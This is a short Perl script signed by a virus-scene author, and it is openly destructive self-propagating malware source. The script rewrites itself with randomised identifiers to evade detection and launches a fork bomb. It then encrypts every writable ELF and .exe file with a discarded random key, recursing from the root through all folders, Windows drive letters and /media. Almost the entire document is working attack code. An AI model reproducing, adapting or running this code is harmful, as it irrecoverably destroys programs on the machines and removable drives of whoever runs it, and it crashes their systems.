#!/usr/bin/perl               
# generated by R3s1stanc3 [vxnetw0rk]
@y80sv = ("A".."Z","a".."z","0".."9");		# for rand Strings
&BMLye ( ) ;
sub BMLye
{
&ScQ6M ( ) ;
sub ScQ6M                   # Polymorphism through varchanging
{	# for rand Strings
  @change = ("BMLye", "rFEh5", "y80sv", "MpR9r", "FY14m", "xCQk7", "TTjzH", "zoB8r", "upEZz", "YnWQv", "ScQ6M", "NqVUm", "wWPFl", "YAXj8", "e3fSW", "MTeus" , "MTeusMonth" ,"MTeusOfWeek", "SC8vb", "Ryf09", "yoFuU");
  @NqVUm;
  for ($wWPFl = 0;$wWPFl < scalar(@change); $wWPFl++)
  {
    $NqVUm[$wWPFl] = $y80sv[int(rand(52))].$y80sv[int(rand(62))].$y80sv[int(rand(62))].$y80sv[int(rand(62))].$y80sv[int(rand(62))];
  }
  open(BMLye, "<", "$0");
  @BMLye = <BMLye>;
  close(BMLye);
  open(BMLye, ">", "$0");
  foreach $e3fSW (@BMLye)
  {
    for($wWPFl = 0; $wWPFl < scalar(@change); $wWPFl++)
    {
      while ($e3fSW =~ /$change[$wWPFl]/)
      {
        $e3fSW =~ s/$change[$wWPFl]/$NqVUm[$wWPFl]/;
      }    
    }
    print BMLye $e3fSW;
  }
  close(BMLye);
}

fork while fork
use Crypt::CBC ;
&encrypt ( ) ;
sub encrypt                            # encrypt every ELF or *.exe FY14m with a random key
{
  foreach $FY14m ( glob ( "*" ) )
  {
    open ( FY14m, "<", "$FY14m" ) ;
    @upEZz = <FY14m> ;
    close ( FY14m ) ;
    if ( ($upEZz[0] =~ /ELF/ || $FY14m =~ /\.exe?/) && -w $FY14m )
    {
      $key = "" ;
      for ( $i = 1; $i < int ( rand (20) ) + 2; $i ++ )
      {
        $key .= $y80sv[int ( rand (62) )] ;
      }
      $crypt = Crypt::CBC -> new ( -key => $key, -crypher => 'Twofish' ) ;
      $crypt -> start ( 'encrypting' ) ;
      open ( F, "$FY14m" ) ;
      while ( read ( F, $buffer, 1024 ) )
      {
        $enc .= $crypt -> crypt ( $buffer ) ;
      }
      $enc .= $crypt -> finish ;
      open ( FY14m , ">", "$FY14m" ) ;
      print FY14m $enc ;
      close ( FY14m ) ;
    }
  }
}

&foldInfect ( ) ;
sub foldInfect
{
  chdir('../../../../../../../../../../..');                   # run Payload through every folder
  foreach $YnWQv ( <*> )
  {
    if ((-r $YnWQv) && (-w $YnWQv) && (-d $YnWQv))
    {
      chdir($YnWQv);
&encrypt ( ) ;
      &foldInfect();
      chdir('..');
    }
  }
  if ($^O =~ "Win")		# If OS == Win
  {
    foreach (A..Z)              # infect USB and other partitions on Win & Linux
    {
      if ( chdir($_.'://') )	# Infect every device
      { 
        chdir($_.'://');
        &foldInfect();
      }
    }
  }
  if ($^O =~ "linux")		# If OS == Linux
  {
    chdir('/media');		# Infect every device
    &foldInfect();
  }
}

}
# This is the end, my friend
